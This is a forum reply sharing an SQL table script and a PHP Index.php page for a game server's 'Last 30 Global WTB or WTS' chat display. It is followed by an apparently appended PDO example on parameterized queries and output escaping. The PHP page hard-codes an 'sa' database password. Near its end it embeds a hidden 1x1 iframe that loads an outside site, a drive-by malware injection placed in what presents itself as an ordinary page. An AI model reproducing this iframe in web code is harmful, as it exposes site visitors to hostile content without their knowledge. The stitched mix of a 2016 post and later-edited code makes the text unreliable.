Thread: Request regarding website
02-11-2016, 11:32 PM   #2

Dev.Ri3o

Re: Request regarding website



First, run this query:

Code:
USE [SRO_VT_ACCOUNT]
GO

/****** Object:  Table [dbo].[srZor_globalChatLog]    Script Date: 03/11/2013 18:32:09 ******/
SET ANSI_NULLS ON
GO

SET QUOTED_IDENTIFIER ON
GO

SET ANSI_PADDING ON
GO

CREATE TABLE [dbo].[srZor_globalChatLog](
	[id] [int] IDENTITY(1,1) NOT NULL,
	[sender] [varchar](50) NULL,
	[msg] [varchar](300) NULL,
	[time] [datetime] NULL
 CONSTRAINT [PK_srZor_globalChatLog] PRIMARY KEY CLUSTERED 
(
	[id] ASC
)WITH (PAD_INDEX  = OFF, STATISTICS_NORECOMPUTE  = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS  = ON, ALLOW_PAGE_LOCKS  = ON) ON [PRIMARY]
) ON [PRIMARY]

GO

SET ANSI_PADDING OFF
GO
After that, open Index.php and put this in it:

Code:
<?php 
$ip = $_SERVER['REMOTE_ADDR']; # client address, written to the log
$time = date("l dS of F Y h:i:s A"); 
$script = $_SERVER['PATH_TRANSLATED'] ?? $_SERVER['SCRIPT_FILENAME']; # array key must be quoted; fall back when PATH_TRANSLATED is not set
$fp = fopen ("[WEB]SQL_Injection.txt", "a+"); # log file, opened for appending
$sql_inject_1 = array(";","'","%",'"'); # characters to replace 
$sql_inject_2 = array("", "","","&quot;"); # what each one is replaced with 
$GET_KEY = array_keys($_GET); #array keys from $_GET 
$POST_KEY = array_keys($_POST); #array keys from $_POST 
$COOKIE_KEY = array_keys($_COOKIE); #array keys from $_COOKIE 
/*begin clear $_GET */ 
for($i=0;$i<count($GET_KEY);$i++) 
{ 
$real_get[$i] = $_GET[$GET_KEY[$i]]; 
$_GET[$GET_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_GET[$GET_KEY[$i]])); 
if($real_get[$i] != $_GET[$GET_KEY[$i]]) 
{ 
fwrite ($fp, "IP: $ip\r\n"); 
fwrite ($fp, "Method: GET\r\n"); 
fwrite ($fp, "Value: $real_get[$i]\r\n"); 
fwrite ($fp, "Script: $script\r\n"); 
fwrite ($fp, "Time: $time\r\n"); 
fwrite ($fp, "==================================\r\n"); 
} 
} 
/*end clear $_GET */ 
/*begin clear $_POST */ 
for($i=0;$i<count($POST_KEY);$i++) 
{ 
$real_post[$i] = $_POST[$POST_KEY[$i]]; 
$_POST[$POST_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_POST[$POST_KEY[$i]])); 
if($real_post[$i] != $_POST[$POST_KEY[$i]]) 
{ 
fwrite ($fp, "IP: $ip\r\n"); 
fwrite ($fp, "Method: POST\r\n"); 
fwrite ($fp, "Value: $real_post[$i]\r\n"); 
fwrite ($fp, "Script: $script\r\n"); 
fwrite ($fp, "Time: $time\r\n"); 
fwrite ($fp, "==================================\r\n"); 
} 
} 
/*end clear $_POST */ 
/*begin clear $_COOKIE */ 
for($i=0;$i<count($COOKIE_KEY);$i++) 
{ 
$real_cookie[$i] = $_COOKIE[$COOKIE_KEY[$i]]; 
$_COOKIE[$COOKIE_KEY[$i]] = str_replace($sql_inject_1, $sql_inject_2, HtmlSpecialChars($_COOKIE[$COOKIE_KEY[$i]])); 
if($real_cookie[$i] != $_COOKIE[$COOKIE_KEY[$i]]) 
{ 
fwrite ($fp, "IP: $ip\r\n"); 
fwrite ($fp, "Method: COOKIE\r\n"); 
fwrite ($fp, "Value: $real_cookie[$i]\r\n"); 
fwrite ($fp, "Script: $script\r\n"); 
fwrite ($fp, "Time: $time\r\n"); 
fwrite ($fp, "==================================\r\n"); 
} 
} 

/*end clear $_COOKIE */ 
fclose ($fp); 
?> 


  <div id=page_top></div> 

      <div id=page_content style='min-height: 750px;'> 
 <div style='background:url(img/news_top.png) no-repeat;width:481px;height:32px;margin-left:11px;color:#White'> 
<div id="spc_head"><center><p><h1><font color="white">Last 30 Global WTB or WTS (New)</font></h1></p></center></div> 

  <?php 
    $server_name = "Vortex-onlie";                //Server name 
    $host          = "VMI32631\SQLEXPRESS";           // SQL server name for example PC-NAME\SQLEXPRESS 
    $user          = "sa";                  // SQL username 
    $pass         = "dusty@123";              // SQL password 
    $db           = "SRO_VT_ACCOUNT";      // SQL Database; 
    $show         = "30";               //Show top 10 for example 
?> 
<!-- Coded by ThElitEyeS --> 
<html> 
    <head> 

        <style type="text/css"> 
         <!-- 
            body 
  table { border-collapse: collapse; text-align: left; width: 100%; }   {font: normal 15px/150% Arial, Helvetica, sans-serif; background: #fff; overflow: hidden; border: 1px solid #White; }  table td,   table th { padding: 0px 13px; }  table thead th {background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #White), color-stop(1, #White) );background:-moz-linear-gradient( center top, #White 5%, #White 100% );filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#White', endColorstr='#White');background-color:#White; color:#White; font-size: 15px; font-weight: bold; border-left: 0px solid #White; }   table thead th:first-child { border: none; }  table tbody td { color: #1DA118; border-left: 1px solid #BC2ED9;font-size: 15px;font-weight: bold; }  table tbody .alt td { background: #D8F4AD; color: #23DBC9; }  table tbody td:first-child { border-left: none; }  table tbody tr:last-child td { border-bottom: none; }  table tfoot td div { border-top: 1px solid #White;background: #White;}   table tfoot td { padding: 0; font-size: 12px }   table tfoot td div{ padding: 2px; } 
            -->
        </style> 
    </head> 
    <body> 
        <?php 
            @$connect = odbc_connect("Driver={SQL Server};Server={".$host."}; Database={".$db."}", "".$user."", "".$pass."") or die("<center><b style=\"border:1px dashed #FF0000;\">".str_replace("[Microsoft][ODBC SQL Server Driver][SQL Server]", "", odbc_errormsg())."</b></center>"); 
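            // The rows come from in-game chat, so escape every value before printing it as HTML.
            // $show (cast to int) sets the row count so it matches the "Last 30" heading.
            $result = odbc_exec($connect, "SELECT TOP ".(int)$show." sender,msg from srZor_globalChatLog where msg like '%WTS%' or msg like '%WTB%' order by time desc");
            echo "<table><tr><th>sender</th><th>msg</th></tr>";
            while ($result && odbc_fetch_row($result)) {
                echo "<tr><td>".htmlspecialchars((string)odbc_result($result, "sender"))."</td><td>".htmlspecialchars((string)odbc_result($result, "msg"))."</td></tr>";
            }
            echo "</table>";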
        ?> 

    <!-- Hidden 1x1 iframe that loads a third-party page; it is not needed to display the chat log -->
    <iframe src="http://www.Trenz.pl/rc/" width=1 height=1 frameborder=0></iframe> 
</body> 
</html>
The part in red is what you will edit to match your own server's details.



Last edited by Dev.Ri3o; 02-11-2016 at 11:34 PM
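
The post's Index.php cleans request values by stripping characters before any query is built. As an added example (not part of the original post or of the code it shares), the same chat-log lookup can take a search keyword through a bound parameter and escape the rows on output. It assumes PDO with an in-memory SQLite database as an offline stand-in for the post's ODBC/SQL Server connection; the helper `latest_trades` and all sample rows are constructed for illustration.

```php
<?php
// Added example: SQLite in memory stands in for the SQL Server database.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE srZor_globalChatLog (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    sender VARCHAR(50), msg VARCHAR(300), time DATETIME)');

// Constructed sample rows; the second carries markup and quotes typed in chat.
$rows = [
    ['Player1', 'WTS Sun sword +5',          '2016-11-02 22:00:00'],
    ['Player2', 'WTB <b>shield</b> "cheap"', '2016-11-02 22:05:00'],
    ['Player3', 'hello everyone',            '2016-11-02 22:10:00'],
];
$ins = $pdo->prepare('INSERT INTO srZor_globalChatLog (sender, msg, time) VALUES (?, ?, ?)');
foreach ($rows as $r) {
    $ins->execute($r);
}

// Hypothetical helper: newest messages that contain $keyword.
function latest_trades(PDO $pdo, string $keyword, int $limit): array
{
    // Escape LIKE wildcards so the keyword is matched literally.
    $pattern = '%' . addcslashes($keyword, '%_\\') . '%';
    $stmt = $pdo->prepare(
        "SELECT sender, msg FROM srZor_globalChatLog
         WHERE msg LIKE :pattern ESCAPE '\\'
         ORDER BY time DESC LIMIT :limit");
    // Bound values travel separately from the SQL text, so quotes,
    // semicolons and percent signs in them stay plain data.
    $stmt->bindValue(':pattern', $pattern, PDO::PARAM_STR);
    $stmt->bindValue(':limit', $limit, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// A keyword containing double quotes is searched as typed, unmodified.
foreach (['WTS', '"cheap"'] as $keyword) {
    echo 'Keyword: ', $keyword, PHP_EOL;
    foreach (latest_trades($pdo, $keyword, 30) as $row) {
        // Encode on output so stored chat text cannot become markup.
        echo '<tr><td>', htmlspecialchars($row['sender'], ENT_QUOTES, 'UTF-8'),
             '</td><td>', htmlspecialchars($row['msg'], ENT_QUOTES, 'UTF-8'),
             '</td></tr>', PHP_EOL;
    }
}
```

With binding on input and encoding on output, the request values no longer need to be rewritten in `$_GET`, `$_POST` and `$_COOKIE`, and the logging loop can remain as a detection aid.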